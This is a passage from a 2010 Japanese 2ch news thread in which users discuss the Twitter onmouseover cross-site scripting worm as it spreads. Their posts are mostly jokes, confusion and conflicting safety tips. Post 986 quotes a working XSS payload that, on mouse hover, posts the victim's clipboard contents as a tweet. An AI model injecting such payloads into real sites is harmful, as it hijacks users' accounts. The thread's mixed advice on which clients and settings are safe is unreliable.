10/09/21 22:53:34.86 BtrGP+ec0
twitter公式が運営止めればいいだけの問題じゃね?
930: 芸人(dion軍)
10/09/21 22:53:43.10 iuqTZchtP
ニュー速民の人がTwitterでどうなってんの?とか聴いてて・・・何やってんだ
931: 絶対に許さない(埼玉県)
10/09/21 22:53:43.28 v6Ddt0Mo0
>>890
お師匠さん、chromeの対策もできれば?
とりあえず今日は繋いでない
932: 洋菓子製造技能士(熊本県)
10/09/21 22:53:44.10 vcw3i6wX0
Tweenダウンして解凍したけど起動しない・・・
933: 評論家(長崎県)
10/09/21 22:53:46.09 YtuarsZX0
2ちゃんだって、山田ウイルスで散々恥かかされた人いっぱいいたじゃない
エロ動画落とした人が2ちゃんの特定板のスレッドにuser 名とドライブの中にアクセスできるリンク
自動投稿させられてさ
934: 芸人(dion軍)
10/09/21 22:53:50.36 o9QAzDyfP BE:727348043-2BP(3383)
sssp://img.2ch.net/ico/1sanmini16.gif
>>922
やばいウイルス
今すぐエロ動画消したほうがいい
935: 工芸家(長野県)
10/09/21 22:53:55.14 /ojC7rIt0
>>906
それはわかる
ページに罠がしかけてあるんだもんね
わからないのは、ログアウトが推奨されてる理由と、
ログインせずに問題のページを開いた場合重大な問題が起こる可能性があるのか
936: 馴れ合い厨(catv?)
10/09/21 22:54:01.18 FzIIud7d0
>>925
動作考えろよw
937: 指揮者(群馬県)
10/09/21 22:54:02.28 CWbhjojfP
>>879
JavaとJavascriptは別物だよう
938: FR-F2(宮城県)
10/09/21 22:54:03.02 9vZdQDR30
>>893
誰かから妙なRTが回ってこなければ関係ない
939: ダイバー(大阪府)
10/09/21 22:54:06.44 5mGbJ2n/0
>>925
危ないから切っとけ
940: モテ男(三重県)
10/09/21 22:54:10.80 iI4xjbNS0
>>867
埋め込みが野放しで緩そうなとこは
利用しないが吉
情弱が集まるとこもな
941: 大工(関西地方)
10/09/21 22:54:13.98 9JsHzDNJ0
URLリンク(twitter.com)にアクセス
危険⇒PC公式twitter、twitter.web、Tween、twitter.com
安全⇒ついっぷる、モバツイ、ゆびったー、などの非公式。
942: 学芸員(東京都)
10/09/21 22:54:16.05 E1FOLRHM0
>>934
おまえも通報すんぞ!
943: 映画評論家(神奈川県)
10/09/21 22:54:20.97 qg3DHXfY0
意味分からんno script入れてればおkなのか?
944: 芸人(dion軍)
10/09/21 22:54:28.62 iuqTZchtP
>>923
さっきからbotさんたちしか呟いてなくてワロタ
945: ホスト(大阪府)
10/09/21 22:54:31.06 /9kpSi/70
それらしい嘘かけば拡散しまくられるのか
楽しいな
946: 三角関係(大阪府)
10/09/21 22:54:41.97 rHE+ANU/0
>>844
これの2個目のほうに当たったわw
放っておくとミクになったのかwwwwwww
947: メイド(福岡県)
10/09/21 22:54:46.66 y0hqemg00
ここでガチャピンが一言↓
948: 芸人(dion軍)
10/09/21 22:54:52.57 o9QAzDyfP BE:1697144674-2BP(3383)
sssp://img.2ch.net/ico/1sanmini16.gif
>>942
何の罪だよww
949: 運輸業(アラバマ州)
10/09/21 22:54:55.56 ZVVf6Xf60
Noscriptはいれるなよ
このご時世Javascript使ってるページがほとんどなんだからw
950: 指揮者(群馬県)
10/09/21 22:54:56.15 CWbhjojfP
フォントは外部クライアントでも表示されるからうざいな
951: 放送作家(アラバマ州)
10/09/21 22:55:04.73 FMDYLixW0
noscriptにしてるとツイートできないのか
952: 韓国人(宮城県)
10/09/21 22:55:04.91 NjGGncLv0
>>935
ログインしてなければ起きないからログアウトが推奨されてるんでせう
URLなんか踏まなくともクッキー消せばいいよ
953: いい男(三重県)
10/09/21 22:55:05.19 xr/AJpHl0
四次元殺法コンビさすがやで
954: 通信士(静岡県)
10/09/21 22:55:06.26 5e0CbQLq0
>>937
はい
955: 児童文学作家(奈良県)
10/09/21 22:55:07.93 5q0DOBfD0
ツイッターやばすぎわろた
956: 指揮者(dion軍)
10/09/21 22:55:08.22 fxaNTrM6P
>>941
お前情弱だろ
957: 学芸員(東京都)
10/09/21 22:55:13.89 E1FOLRHM0
>>948
嘘つきの刑
958: カウンセラー(埼玉県)
10/09/21 22:55:15.44 KlEcrRVo0
どっかの国のバカ省庁が公式アカウント持ってたはずだけどこういうときどうすんのwww
959: たこ焼き(大阪府)
10/09/21 22:55:16.98 3L6HJl1J0
で、これでどういう悪さされるの?
960: 車掌(埼玉県)
10/09/21 22:55:32.20 QDZ3siCH0
>>949
馬鹿に使わせると余計に困る代物だしな
νカスなんかで薦められる物じゃない
961: 営業職(長屋)
10/09/21 22:55:35.65 2qKk7Sk90
CNNの翻訳が笑えたw
URLリンク(honyaku.yahoofs.jp)
VkaXRpb24uY25uLmNvbS8yMDEwL1RFQ0gvc29jaWFsLm1lZGlhLzA5LzIxL3R3aXR0ZXI
uc2VjdXJpdHkuZmxhdy9pbmRleC5odG1sP29uLmNubj0x,qlang=ja|for=0|sp=-5|fs=
100%|fb=0|fi=0|fc=FF0000|db=T|eid=CR-EJ,k6c6d8a880c19ee05e68b7df4b39eb791,t20100922105407,
962: 動物看護士(福島県)
10/09/21 22:55:35.56 tsxmDw7m0
>>911
ねらーは立ち上がらんの?
963: ジャーナリスト(埼玉県)
10/09/21 22:55:42.40 BtrGP+ec0
次スレは要らんな
964: 学芸員(東京都)
10/09/21 22:55:45.02 E1FOLRHM0
>>958
厚生労働省だっけ?
965: ネット乞食(埼玉県)
10/09/21 22:55:45.24 kuMtyKPj0
今の情勢だと中国人の仕業としか思えんなww
966: たこ焼き(アラバマ州)
10/09/21 22:55:52.35 oqL9Uryx0
>>899
あっホントだ!コレの作者だったのか
967: 家畜人工授精師(アラバマ州)
10/09/21 22:55:56.24 lVzz3q4C0
(´・ω・`) 結局どういうことなの? ママみたいに優しく教えてくれよ
968: ファッションデザイナー(アラバマ州)
10/09/21 22:55:57.04 RU7T7Afs0
情弱多すぎて泣ける、メルトカル以来じゃないの
969: セラピスト(東日本)
10/09/21 22:55:58.14 MLwhTsBq0
>>875
ログアウトすればツイッターのセッションジャックされないだけで
外部js実行できるから危険には変わりない
970: 馴れ合い厨(catv?)
10/09/21 22:55:59.23 FzIIud7d0
>>941
お前馬鹿だろ
971: バランス考えろ(東日本)
10/09/21 22:56:01.20 3n1IvMCW0
闇のスクリプターがせめこんできたな
972: 芸術家(静岡県)
10/09/21 22:56:06.76 x9bKQGPF0
引っかかって騒いでる情弱が滑稽
973: 社会のゴミ(チリ)
10/09/21 22:56:06.80 uU1lmu4c0
>>938
そういうことか
安心した
974: 指揮者(不明なsoftbank)
10/09/21 22:56:17.31 2dIKCJMMP
まとめ
■今回の騒ぎはソースコードによるブラクラの一種
・ウィルス感染
・アカウント乗っ取り
とは関係ない
しかし念のためブラウザのクッキーとテンポラリファイルの削除はしておくこと
■騒ぎが収まるまでブラウザでの閲覧はやめること。
しかし現在FireFoxにNoscriptをいれれば問題なくwebから見ることができる
975: ジャーナリスト(埼玉県)
10/09/21 22:56:24.07 BtrGP+ec0
>>967
>>30
976: 韓国人(宮城県)
10/09/21 22:56:28.97 NjGGncLv0
厚生省のTwitterの背景を例のエロゲ画像にしてやれよ
誰かw
977: ちんシュ大好き(関西地方)
10/09/21 22:56:34.64 YXV4xqxe0
マジかよ!すげぇ!
978: 脚本家(長野県)
10/09/21 22:56:36.00 +LBpRpJH0
>>923
公式のキャラとかも通常運転してたみたいだな
979: 運営大好き(東京都)
10/09/21 22:56:47.70 Hg+ch9pZ0
なぜか知らんがこのスレだけ横に無限スクロールできるぞ。
980: 船員(千葉県)
10/09/21 22:56:51.35 p+WPeCjJ0
直ったよ
981: パン製造技能士(dion軍)
10/09/21 22:57:03.58 r3Vfggji0
2chはテキストだけだから安全だしなw
982: 内閣総理大臣(アラバマ州)
10/09/21 22:57:11.81 oi6ZvktN0
>>957
×刑 ○罪
983: 評論家(埼玉県)
10/09/21 22:57:15.20 35txBi010
>>844
なんかちょっとカッコいいw
984: 家畜人工授精師(アラバマ州)
10/09/21 22:57:16.53 lVzz3q4C0
>>975
(´・ω・`)ノありり
985: マフィア(関西地方)
10/09/21 22:57:18.83 rzaGXDjn0
有名な脆弱性だったけど今更かよ
世間は俺より10年は遅れているな
986: ドラグノフ(石川県)
10/09/21 22:57:19.37 jsDUnOOl0
>>869
URLリンク(t.co)"onmouseover="document.getElementById('status').value=clipboardData.getData("Text");$('.status-update-form').submit();"style="background:red"/
987: 学芸員(東京都)
10/09/21 22:57:21.51 E1FOLRHM0
>>981
ホントか?
988: 鉄パイプ(アラバマ州)
10/09/21 22:57:23.86 7viTHgur0
1000なら俺の人生の脆弱性が見つかる
989: 幼稚園の先生(千葉県)
10/09/21 22:57:27.41 gH98ZY0s0
ブラクラ強制閲覧状態で気持ち悪い
990: ソムリエ(関西地方)
10/09/21 22:57:29.73 3ZEZVU570
>>935
ログアウト推奨は事態を詳しく掴めてない段階で広まった対処法だろう。
ログアウト後もページへアクセスするのはやめたほうがいい。
ツイートやRTなどのログインしてないと出来ない操作はされないけど、
外部js呼出なんかは可能だろう。
URLリンク(status.twitter.com)
つーか対策されたんじゃね?
991: 仲居(東京都)
10/09/21 22:57:37.83 5gUI6+8S0
>>941
なんで Tween だけAPIで危険なんだよwww
992: 登山家(catv?)
10/09/21 22:57:44.85 BH/Fji/w0
tweenじゃjavascript動かせない=何も起きない
よって安全
993: 高卒(鳥取県)
10/09/21 22:57:46.28 riZaghK60
>>981
なんでこのスレ開いて全部押しただけでこんなことに…
URLリンク(www1.axfc.net)
994: アナウンサー(アラバマ州)
10/09/21 22:57:46.58 e29ZO2tH0
なんかXSSの脆弱性はもうなくなったと公式アナウンスがあったみたい
995: 公務員(北海道)
10/09/21 22:57:51.35 DMb6m//u0
よろしくおねがいしまーーーーーーす!!
996: 洋菓子製造技能士(熊本県)
10/09/21 22:57:57.38 vcw3i6wX0
もう治ったわ
997: レス乞食(三重県)
10/09/21 22:58:05.36 TdWdEy0X0
1000get
998: いい男(三重県)
10/09/21 22:58:05.52 xr/AJpHl0
Twitter死亡
999: 新聞配達(東京都)
10/09/21 22:58:11.54 X5MUZwDK0
1000ならツイッター死亡
1000: 工芸家(長野県)
10/09/21 22:58:12.91 /ojC7rIt0
>>952,969
オイコラどっちだw
理屈では、多分後者じゃないかなと思うんだけど
1001:1001
Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しい職を探して下さい。。。
ニュース速報
URLリンク(www.hellowork.go.jp)